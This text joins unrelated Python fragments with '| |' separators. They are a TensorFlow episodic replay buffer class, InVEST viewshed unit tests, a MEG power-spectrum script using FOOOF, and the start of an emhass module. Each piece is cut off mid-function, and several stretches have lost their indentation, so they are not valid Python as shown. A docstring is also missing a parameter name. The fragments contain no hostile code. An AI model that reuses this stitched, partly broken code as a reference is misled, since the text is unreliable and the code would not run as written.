                # Force both the length update and the data write to run
                # before the episode id is returned to the caller.
                with tf.control_dependencies([inc_episode_length, write_data_op]):
                    return tf.identity(new_episode_id)

            # Accessing episode_id may modify
            # self._episodes_loc_to_id_map, so ensure it is executed
            # before the tf.equal.
            with tf.control_dependencies([new_episode_id]):
                # The write is valid only if this buffer slot still maps to
                # our episode id (i.e. it has not been recycled).
                episode_valid = tf.equal(
                    self._episodes_loc_to_id_map[episode_location], new_episode_id)

            def _maybe_add_steps():
                # Serialize the write with other episode mutations.
                return self._add_episode_critical_section.execute(_add_steps)

            return utils.smart_cond(
                episode_valid,
                _maybe_add_steps,
                lambda: tf.identity(new_episode_id),
                name='conditioned_add_steps')
def add_batch(self, items, episode_ids):
    """Adds a batch of single steps for the corresponding episodes IDs.

    Args:
      items: A batch of items to be added to the buffer. Items will have the
        same structure as the data_spec of this class, but the tensors in items
        will have an extra outer dimension `(num_episodes, ...)` in addition to
        the corresponding spec in data_spec.
      episode_ids: A int64 vector `Tensor` containing the ids of the
        episodes the items are being added to. Shaped `(num_episodes,)`.

    Returns:
      A `Tensor` containing the updated episode ids. Accessing or executing
      this tensor also adds `items` to the replay buffer.
    """
    episode_ids.shape.assert_has_rank(1)
    with tf.device(self._device):
        with tf.name_scope('add_batch'):
            # If begin_episode is True, then the increment of the episode_id happens
            # before trying to add anything to the buffer, regardless of whether the
            # item will actually be added.
            begin_episode = self._begin_episode_fn(items)
            end_episode = self._end_episode_fn(items)
            batch_episode_ids = self._get_batch_episode_ids(episode_ids,
                                                            begin_episode,
                                                            end_episode)
            # An episode's buffer slot is its id modulo the ring capacity.
            episodes_locations = tf.math.mod(batch_episode_ids, self._capacity)
            # Accessing episode_id may modify self._episodes_loc_to_id_map, so
            # ensure it is executed before the validity check below.
            with tf.control_dependencies([episodes_locations]):
                # Valid entries are those whose slot still maps back to the
                # same episode id (the slot has not been recycled).
                episode_valid = tf.equal(
                    self._episodes_loc_to_id_map.sparse_read(episodes_locations),
                    batch_episode_ids)

            def _add_batch():
                """Add elements to the appropriate episode_locations."""
                # Keep only the batch entries whose episode is still valid.
                ids_to_update = tf.reshape(tf.compat.v1.where(episode_valid), [-1])
                episodes_locations_ = tf.gather(episodes_locations, ids_to_update)
                filter_items = lambda item: tf.gather(item, ids_to_update)
                items_ = tf.nest.map_structure(filter_items, items)
                write_data_op = self._data_table.add(episodes_locations_, items_)
                inc_episode_lengths = self._increment_episode_length_locked(
                    episodes_locations_)
                inc_write_counter_op = self._num_writes.assign_add(1)
                # The write, the length update and the counter must all run
                # before the updated ids are handed back.
                with tf.control_dependencies([
                    write_data_op, inc_episode_lengths, inc_write_counter_op]):
                    return tf.identity(batch_episode_ids)

            num_adds = tf.reduce_sum(input_tensor=tf.cast(episode_valid, tf.int64))

            def _maybe_add_batch():
                # Serialize the write with other episode mutations.
                return self._add_episode_critical_section.execute(_add_batch)

            # Skip the critical section entirely when no entry is valid.
            return tf.cond(
                pred=num_adds > 0,
                true_fn=_maybe_add_batch,
                false_fn=lambda: episode_ids)
def gather_all(self):
    """Return every item currently stored in the buffer.

    Returns:
      All buffered items as a tensor of shape [1, SUM(T_i), ...]. Episodes
      can have different lengths, so the steps of every episode are grouped
      into one batch entry: the first dimension is batch size = 1 and the
      second dimension is the total number of timesteps over all episodes
      (SUM(T_i) for i in episode_ids). The remaining dimensions follow the
      spec of the items stored in the buffer.
    """
    # The second element of the tuple (buffer info) is not exposed here.
    return self._gather_all()[0]
# Defining abstract methods from replay_buffers.ReplayBuffer
def _add_batch(self, items):
raise NotImplementedError("""add_batch(items) is not implemented in
EpisodicReplayBuffer. Use add_batch(items, episode_ids) instead""")
def _get_next(self,
              sample_batch_size=None,
              num_steps=None,
              time_stacked=None):
    """Returns an episode sampled uniformly from the buffer.

    Args:
      sample_batch_size: Not used.
      num_steps: Not used.
      time_stacked: Not used.

    Returns:
      A 2-tuple containing:
        - An episode sampled uniformly from the buffer.
        - BufferInfo NamedTuple, containing the episode id.
    """
    with tf.device(self._device):
        with tf.name_scope('get_next'):
            # Draw a single episode id uniformly at random.
            sampled_id = self._sample_episode_ids(shape=[], seed=self._seed)
            # Resolve the id to its slot, then read data and stored id.
            slot = self._get_episode_id_location(sampled_id)
            episode_data = self._data_table.get_episode_values(slot)
            stored_id = self._id_table.read(slot)
            return episode_data, BufferInfo(ids=stored_id)
def _as_dataset(self,
sample_batch_size=None,
num_steps=None,
sequence_preprocess_fn=None,
num_parallel_calls=tf.data.experimental.AUTOTUNE):
"""Creates a dataset that returns episodes entries from the buffer.
The dataset behaves differently depending on if `num_steps` is provided or
not. If `num_steps = None`, then entire episodes are sampled uniformly at
random from the buffer. If `num_steps != None`, then we attempt to sample
uniformly across frames of all the episodes, and return subsets of length
`num_steps`. The algorithm for this is roughly:
1. Sample an episode with a probability proportional to its length.
2. If the length of the episode is less than `num_steps`, drop it.
3. Sample a starting location `start` in `[0, len(episode) - num_steps]`
4. Take a slice `[start, start + num_steps]`.
The larger `num_steps` is, the higher the likelihood of edge effects (e.g.,
certain frames not being visited often because they are near the start
or end of an episode). In the worst case, if `num_steps` is greater than
most episode lengths, those episodes will never be visited.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. See as_dataset() documentation.
num_steps: (Optional.) Scalar int. How many contiguous frames to get
per entry. Default is `None`: return full-length episodes.
sequence_preprocess_fn: (Optional.) Preprocessing function for sequences
before they are sharded into subsequences of length `num_steps` and
batched.
num_parallel_calls: Number of parallel calls to use in the
dataset pipeline when extracting episodes. Default is to have
tensorflow determine the optimal number of calls.
Returns:
A dataset of type tf.data.Dataset, elements of which are 2-tuples of:
- An item or sequence of items sampled uniformly from the buffer.
- BufferInfo NamedTuple, containing the episode id.
Raises:
ValueError: If the data spec contains lists that must be converted to
tuples.
NotImplementedError: If `sequence_preprocess_fn != None` is passed in.
"""
if sequence_preprocess_fn is not None:
raise NotImplementedError('sequence_preprocess_fn is not supported.')
# data_tf.nest.flatten does not flatten python lists, tf.nest.flatten does.
if tf.nest.flatten(self._data_spec) != data_nest.flatten(self._data_spec):
raise ValueError(
'Cannot perform gather; data spec contains lists and this conflicts '
'with gathering operator. Convert any lists to tuples. '
'For example, if your spec looks like [a, b, c], '
'change it | |
= (5, 5)
max_dist = 4
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
viewshed((dem_filepath, 1), viewpoint, visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=1.0, max_distance=max_dist)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.zeros(matrix.shape)
expected_visibility = numpy.array(
[[255, 255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 0],
[255, 255, 255, 1, 1, 1],
[255, 255, 1, 1, 1, 1],
[255, 255, 1, 1, 1, 1],
[255, 0, 1, 1, 1, 1]], dtype=numpy.uint8)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_refractivity(self):
    """SQ Viewshed: refractivity partly compensates for earth's curvature."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.array([[2, 1, 1, 2, 1, 1, 1, 1, 1, 50]])
    viewpoint = (0, 0)
    dem[viewpoint] = 2
    dem[0, 3] = 2  # small hill between viewpoint and far structure
    # Pixels are 1km across. With the viewpoint a couple of metres up, the
    # horizon falls a few km out; the 50m structure 10km out should still be
    # visible above the horizon.
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    ViewshedTests.create_dem(dem, dem_path, pixel_size=(1000, -1000))
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    viewshed((dem_path, 1), viewpoint, vis_path,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'),
             refraction_coeff=0.1)
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    # Because of the refractivity correction (and the pixel size), the
    # rightmost pixel is visible even though pixels behind the hill at (0, 3)
    # are hidden.
    expected = numpy.array(
        [[1, 1, 1, 1, 0, 0, 0, 0, 0, 1]], dtype=numpy.uint8)
    numpy.testing.assert_equal(result, expected)
def test_intervening_nodata(self):
    """SQ Viewshed: intervening nodata does not affect visibility."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    nodata = 255
    # A nodata pixel sits between the viewpoint and the last pixel.
    dem = numpy.array([[2, 2, nodata, 3]])
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    ViewshedTests.create_dem(dem, dem_path, nodata=nodata)
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    viewshed((dem_path, 1), (0, 0), vis_path,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'),
             refraction_coeff=0.0)
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    # Nodata itself is reported not-visible, but the pixel beyond it is.
    expected = numpy.array([[1, 1, 0, 1]], dtype=numpy.uint8)
    numpy.testing.assert_equal(result, expected)
def test_nodata_undefined(self):
    """SQ Viewshed: assume a reasonable nodata value if none defined."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    nodata = None  # viewshed assumes an unlikely nodata value.
    dem = numpy.array([[2, 2, 1, 3]])
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    ViewshedTests.create_dem(dem, dem_path, nodata=nodata)
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    viewshed((dem_path, 1), (0, 0), vis_path,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'),
             refraction_coeff=0.0)
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    # The low pixel at index 2 is occluded; the taller one beyond is seen.
    expected = numpy.array([[1, 1, 0, 1]], dtype=numpy.uint8)
    numpy.testing.assert_equal(result, expected)
def test_block_size_check(self):
    """SQ Viewshed: exception raised when blocks not equal, power of 2."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    srs = osr.SpatialReference()
    srs.ImportFromEPSG(4326)
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    # 20x40 raster blocks: unequal and not powers of two, so the viewshed
    # routine is expected to reject the raster.
    pygeoprocessing.testing.create_raster_on_disk(
        [numpy.ones((10, 10))], (0, 0), projection_wkt=srs.ExportToWkt(),
        nodata=-1, pixel_size=(1, -1),
        raster_driver_creation_tuple=(
            'GTIFF', ('TILED=NO', 'BIGTIFF=YES', 'COMPRESS=LZW',
                      'BLOCKXSIZE=20', 'BLOCKYSIZE=40')),
        filename=dem_path)
    with self.assertRaises(ValueError):
        viewshed(
            (dem_path, 1), (0, 0), vis_path,
            aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
        )
def test_view_from_valley(self):
    """SQ Viewshed: test visibility from within a pit."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    # Concentric raised rings around a pit at (5, 5).
    dem = numpy.zeros((9, 9))
    dem[5:8, 5:8] = 2
    dem[4:7, 4:7] = 1
    dem[5, 5] = 0
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed((dem_path, 1), (5, 5), vis_path,
             refraction_coeff=1.0,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'))
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    # From the pit floor, only the raised ring cells and the viewpoint
    # itself are visible.
    expected = numpy.zeros(result.shape)
    expected[dem != 0] = 1
    expected[5, 5] = 1
    numpy.testing.assert_equal(result, expected)
def test_tower_view_from_valley(self):
    """SQ Viewshed: test visibility from a 'tower' within a pit."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    # Same concentric-ring pit as test_view_from_valley ...
    dem = numpy.zeros((9, 9))
    dem[5:8, 5:8] = 2
    dem[4:7, 4:7] = 1
    dem[5, 5] = 0
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    # ... but the viewpoint now sits on a 10-unit tower above the pit floor.
    viewshed((dem_path, 1), (5, 5), vis_path,
             viewpoint_height=10,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'))
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    # From that height the tower sees over both rings: everything visible.
    numpy.testing.assert_equal(result, numpy.ones(result.shape))
def test_primitive_peak(self):
    """SQ Viewshed: looking down from a peak renders everything visible."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.zeros((8, 8))
    dem[4:7, 4:7] = 1
    dem[5, 5] = 2  # the peak doubles as the viewpoint
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed((dem_path, 1), (5, 5), vis_path,
             aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif'),
             refraction_coeff=1.0)
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    numpy.testing.assert_equal(result, numpy.ones(dem.shape))
def test_cliff_bottom_half_visibility(self):
    """SQ Viewshed: visibility for a cliff on bottom half of DEM."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.full((20, 20), 2.0)
    dem[7:] = 10  # cliff at row 7
    viewpoint = (5, 10)
    dem[viewpoint] = 5  # viewpoint
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed(
        dem_raster_path_band=(dem_path, 1),
        # NOTE: coordinates swapped here; the other cliff tests use the
        # symmetric point (10, 10) so no swap is visible there.
        viewpoint=(viewpoint[1], viewpoint[0]),
        visibility_filepath=vis_path,
        aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
    )
    # Only the cliff face is seen; rows beyond its edge are hidden.
    expected = numpy.ones(dem.shape)
    expected[8:] = 0
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    numpy.testing.assert_equal(result, expected)
def test_cliff_top_half_visibility(self):
    """SQ Viewshed: visibility for a cliff on top half of DEM."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.full((20, 20), 2.0)
    dem[:8] = 10  # cliff at row 8
    viewpoint = (10, 10)
    dem[viewpoint] = 5  # viewpoint
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed(
        dem_raster_path_band=(dem_path, 1),
        viewpoint=viewpoint,
        visibility_filepath=vis_path,
        aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
    )
    # Rows above the cliff face are hidden from the viewpoint.
    expected = numpy.ones(dem.shape)
    expected[:7] = 0
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    numpy.testing.assert_equal(result, expected)
def test_cliff_left_half_visibility(self):
    """SQ Viewshed: visibility for a cliff on left half of DEM."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.full((20, 20), 2.0)
    dem[:, :8] = 10  # cliff at column 8
    viewpoint = (10, 10)
    dem[viewpoint] = 5  # viewpoint
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed(
        dem_raster_path_band=(dem_path, 1),
        viewpoint=viewpoint,
        visibility_filepath=vis_path,
        aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
    )
    # Columns to the left of the cliff face are hidden.
    expected = numpy.ones(dem.shape)
    expected[:, :7] = 0
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    numpy.testing.assert_equal(result, expected)
def test_cliff_right_half_visibility(self):
    """SQ Viewshed: visibility for a cliff on right half of DEM."""
    from natcap.invest.scenic_quality.viewshed import viewshed
    dem = numpy.full((20, 20), 2.0)
    dem[:, 12:] = 10  # cliff at column 12 (original comment said 8)
    viewpoint = (10, 10)
    dem[viewpoint] = 5  # viewpoint
    dem_path = os.path.join(self.workspace_dir, 'dem.tif')
    vis_path = os.path.join(self.workspace_dir, 'visibility.tif')
    ViewshedTests.create_dem(dem, dem_path)
    viewshed(
        dem_raster_path_band=(dem_path, 1),
        viewpoint=viewpoint,
        visibility_filepath=vis_path,
        aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
    )
    # Columns to the right of the cliff face are hidden.
    expected = numpy.ones(dem.shape)
    expected[:, 13:] = 0
    raster = gdal.OpenEx(vis_path, gdal.OF_RASTER)
    result = raster.GetRasterBand(1).ReadAsArray()
    numpy.testing.assert_equal(result, expected)
def test_pillars(self):
"""SQ Viewshed: put a few pillars in a field, can't see behind them."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
# Put a couple of pillars in there.
for pillar in (
(2, 5),
(18, 5),
(7, 18)):
matrix[pillar] = 10
viewpoint = (10, 10)
matrix[viewpoint] = 5 # so it stands out in the DEM
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=viewpoint,
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.array(
[[1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Computes broadband power, offset and slope of power spectrum
Based on selected epochs (e.g. ASCIIS) in the list of files a power spectrum
is computed. Based on this power spectrum the broadband power is calculated,
followed by the offset and slope using the FOOOF algorithm.
Reference paper FOOOF: <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, <NAME>, <NAME> (2018) Parameterizing Neural
Power Spectra. bioRxiv, 299859. doi: https://doi.org/10.1101/299859
reference Github: https://fooof-tools.github.io/fooof/index.html
"""
__author__ = '<NAME>'
__contact__ = '<EMAIL>' # or <EMAIL>
__date__ = '2020/09/14' ### Date it was created
__status__ = 'Finished'
####################
# Review History #
####################
# Reviewed and Updated by Eduarda Centeno 20201030
####################
# Libraries #
####################
# Standard imports
import time
import os
import glob
import ast
from datetime import date
# Third party imports
import numpy as np # version 1.19.1
import matplotlib.pyplot as plt # version 3.3.0
import pandas as pd # version 1.1.0
from scipy import signal # version 1.4.1
from fooof import FOOOF # version 0.1.3
# Define Functions ------------------------------------------------------------
def find_paths(main_dir, subject, extension, **kwargs):
    """ Flexible way to find files in subdirectories based on keywords

    Parameters
    ----------
    main_dir: str
        Give the main directory where the subjects' folders are stored
    subject: str
        Give the name of the subject to be analyzed
    extension: str
        Give the extension type
    **kwargs: str
        Give keywords that will be used in the filtering of paths

        !Important!
        It is possible to use the kwargs 'start' & 'end' (int) OR
        'selection' (list or str) for selecting epochs. The 'selection'
        list should contain the exact way in which the Tr is written, e.g.
        Tr01, or Tr_1, etc.

    Examples
    -------
    Ex.1
    find_paths(main_dir='/data/KNW/NO-cohorten/Scans/',
               subject='sub-9690',
               extension='.asc',
               key1='T1',
               key2='BNA',
               key3='Tr_7')

    This example will result in a list with a single path:
        ['.../T1/BNA/1_100_WITH_200_WITH_246_VE_89.643to102.750_Tr_7.asc']

    Ex2.
    find_paths(main_dir='/data/KNW/NO-cohorten/Scans/',
               subject='sub-9690',
               extension='.asc',
               key1='T1',
               key2='BNA',
               start=20,
               end=23)

    This example will result in a list with several paths:
        ['.../T1/BNA/1_100_WITH_200_WITH_246_VE_260.037to273.143_Tr_20.asc',
         '.../T1/BNA/1_100_WITH_200_WITH_246_VE_273.144to286.250_Tr_21.asc',
         '.../T1/BNA/1_100_WITH_200_WITH_246_VE_286.251to299.358_Tr_22.asc',
         '.../T1/BNA/1_100_WITH_200_WITH_246_VE_299.358to312.465_Tr_23.asc']

    Ex3.
    find_paths(main_dir='/data/doorgeefluik/',
               subject='mumo_002',
               extension='.asc',
               key1='OD1',
               selection=['Tr01', 'Tr04'])

    Returns
    -------
    updatedfilter: list
        List with path strings

    Notes
    -------
    Be careful that final slicing for 'start' & 'end' is done assuming that
    the sorting step was correct. Thus, it is based on index not on finding the
    specific start-end values in the string. This was done because the tested
    paths had various ways of using Tr (e.g. Tr_1 or Tr_01, or Tr1 or Tr_01) -
    what caused inconsistencies in the output.
    """
    # Check if arguments are in the correct type
    assert isinstance(main_dir, str), 'Argument must be str'
    assert isinstance(subject, str), 'Argument must be str'
    assert isinstance(extension, str), 'Argument must be str'
    # Filtering step based on keywords
    firstfilter = glob.glob(main_dir + subject + '/**/*' + extension,
                            recursive=True)
    updatedfilter = firstfilter
    print('\n..............NaN keys will be printed.................')
    start = None
    end = None
    selection = None
    for key, value in kwargs.items():
        # In case the key value is NaN (possible in subjects dataframe)
        if not isinstance(value,list) and pd.isnull(value):
            print(key + '= NaN')
            continue
        elif key == 'start':
            assert isinstance(value, (int,str,float)), 'Argument must be int or number str'
            start = int(value)
        elif key == 'end':
            assert isinstance(value, (int,str,float)), 'Argument must be int or number str'
            end = int(value)
        elif key == 'selection':
            if isinstance(value, list):
                selection = value
            elif isinstance(value, str):
                selection = value.replace(';',',')  # Step that convert ; to , (used in example.csv)
                selection = ast.literal_eval(selection)
                assert isinstance(selection, list), 'Argument should end up being a list of Tr numbers strings'
                assert all(isinstance(item, str) for item in selection), 'Argument must be a list of of Tr numbers strings'
        else:
            # NOTE(review): resetting start/end/selection for every other
            # keyword clobbers values set by earlier kwargs; this relies on
            # 'start'/'end'/'selection' being passed AFTER the path-filter
            # keywords (as in the docstring examples) -- confirm intent.
            start = None
            end = None
            selection = None
            # Update list according to key value (keep only paths that
            # contain this keyword's value as a substring).
            updatedfilter = list(filter(lambda path: value in path, updatedfilter))
    # Check if too many arguments were passed!
    print('\n..............Checking if input is correct!.................')
    # NOTE(review): '(start and end) != None' is a truthiness test, not a
    # None test -- it misbehaves if start or end is 0. Epoch numbers start
    # at 1 in this pipeline, so it works in practice; confirm before reuse.
    if (start and end) != None and selection != None:
        raise RuntimeError('User should use Start&End OR Selection')
    else:
        print('All good to continue! \n')
        pass
    # To find index of Tr (last appearance)
    location = updatedfilter[0].rfind('Tr')
    # Sort list according to Tr* ending (+1 was necessary to work properly)
    updatedfilter.sort(key=lambda path:int(''.join(filter(str.isdigit, path[location+1 :]))))
    # After the list is sorted, slice by index.
    if (start and end) != None:
        print('Start&End were given. \n' +
              '-- Start is: ' + str(start) +
              '\n--End is: ' + str(end))
        # Epochs are 1-based, hence the start-1 offset into the sorted list.
        updatedfilter = updatedfilter[start-1:end]
    # After the list is sorted, intersect with selection.
    elif selection != None:
        print('\nA selection of values was given.' +
              '\nThe selection was: ' + str(selection))
        updatedlist=[]
        for item in selection:
            # Match e.g. 'Tr04.asc' in the tail of the path (after 'Tr').
            updatedlist += list(filter(lambda path: item + extension in path[location:], updatedfilter))
        updatedfilter = updatedlist
    return updatedfilter
def make_csv(csv_path, output_path, extension = '.asc'):
    """Insert the number of epochs to include in the analysis into a csv.

    The epoch count is the minimum number of epochs available over all
    subjects, so every subject contributes the same amount.

    Parameters
    ----------
    csv_path : str,
        path to the csv containing information on subjects to include
    output_path: str,
        complete path to output new csv (e.g. '/path/to/folder/new_csv.csv')
    extension : str,
        file extension of meg files (e.g. '.asc'), default = '.asc'

    Returns
    -------
    None
        saves the extended csv to `output_path` (i.e. overwrites old csv)
    epochs_df: pandas DataFrame,
        dataframe containing the filepaths to the epochs included for every
        subject
    """
    subjects = pd.read_csv(csv_path, delimiter = ',', header =0)
    # Count the epochs available for every subject.
    epochs_available = []
    for _, row in subjects.iterrows():
        found = find_paths(main_dir=row['Path'],
                           subject=row['Case_ID'],
                           extension=extension,
                           timepoint=row['MM'],
                           atlas=row['Atlas'])
        epochs_available.append(len(found))
    # Every subject gets the smallest shared epoch count.
    smallest = min(epochs_available)
    subjects['Start'] = np.repeat(1, len(subjects['Path']))
    subjects['End'] = np.repeat(smallest, len(subjects['Path']))
    # Save the csv extended with the epoch range to analyse.
    subjects.to_csv(output_path, index = False, sep = ',')
    # Re-load so the ranges used below match exactly what was written.
    saved = pd.read_csv(output_path)
    subject_ids = []
    subject_paths = []
    # Collect the asc files within the Start/End range for each subject.
    for _, row in saved.iterrows():
        subject_ids.append(row['Case_ID'])
        subject_paths.append(find_paths(main_dir=row['Path'],
                                        subject=row['Case_ID'],
                                        extension=extension,
                                        timepoint=row['MM'],
                                        atlas=row['Atlas'],
                                        start = row['Start'],
                                        end = row['End']))
    # One row per subject, indexed by the subject ID.
    epochs_df = pd.DataFrame(subject_paths)
    epochs_df.set_index([pd.Index(subject_ids)], 'Subs', inplace = True)
    return epochs_df
def cal_power_spectrum(timeseries, nr_rois=np.arange(92), fs=1250,
window='hamming', nperseg=4096, scaling='spectrum',
plot_figure=False, title_plot='average power spectrum'):
""" Calculate (and plot) power spectrum of timeseries
Parameters
----------
timeseries: DataFrame with ndarrays
Rows are timepoints, columns are rois/electrodes
Give list with rois/electrodes you want to include,
default=np.arange(92)
fs: int, optional
Sample frequency, default=1250
window: str or tuple, optional
Type of window you want to use, check spectral.py for details,
default='hamming'
nperseg : int, optional
Length of each segment, default=4096
scaling : str, optional
'density' calculates the power spectral density (V**2/Hz), 'spectrum'
calculates the power spectrum (V**2), default='spectrum'
plot_figure: bool
Creates a figure of the mean + std over all rois/electrodes,
default=False
title_plot: str
Give title of the plot, default='average power spectrum'
Returns
-------
f: ndarray
Array with sample frequencies (x-axis of power spectrum plot)
pxx: ndarray
Columns of power spectra for each roi/VE
"""
pxx = np.empty([int(nperseg/2+1), np.size(nr_rois)])
i = 0
for roi in nr_rois:
(f, pxx[:,i]) = signal.welch(timeseries[roi].values, fs, window,
nperseg, scaling=scaling)
i = i + 1
if plot_figure==True:
plt.figure()
plt.plot(f, np.mean(pxx,1), color='teal')
plt.plot(f, np.mean(pxx,1)+np.std(pxx,1), color='teal', linewidth=0.7)
plt.plot(f, np.mean(pxx,1)-np.std(pxx,1), color='teal', linewidth=0.7)
plt.fill_between(f, np.mean(pxx,1)+np.std(pxx,1), np.mean(pxx,1)
-np.std(pxx,1), color='teal', alpha=0.2)
plt.xlim(0, 50)
plt.xlabel('Frequency (Hz)')
plt.title(title_plot)
plt.show()
return f, pxx
def find_nearest(array, value):
    """Locate the entry of ``array`` that lies closest to ``value``.

    Used for frequencies, where duplicate-value issues do not arise.

    Parameters
    ----------
    array : array-like
        Values in which to search for the closest match.
    value : int or float
        The value of interest.

    Returns
    -------
    idx : int
        Index of the entry nearest to ``value`` (the first one on ties).
    """
    distances = np.abs(np.asarray(array) - value)
    return distances.argmin()
def cal_FOOOF_parameters(pxx, f, freq_range=[0.5, 48]):
""" Obtain slope and offset using the FOOOF algorithm
Reference paper: <NAME>, | |
<reponame>davidusb-geek/emhass<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse, os, pathlib, logging, json, copy, pickle
import pandas as pd
from datetime import datetime, timezone
from typing import Optional
from distutils.util import strtobool
from importlib.metadata import version
from emhass.retrieve_hass import retrieve_hass
from emhass.forecast import forecast
from emhass.optimization import optimization
from emhass import utils
def set_input_data_dict(config_path: pathlib.Path, base_path: str, costfun: str,
    params: str, runtimeparams: str, set_type: str, logger: logging.Logger,
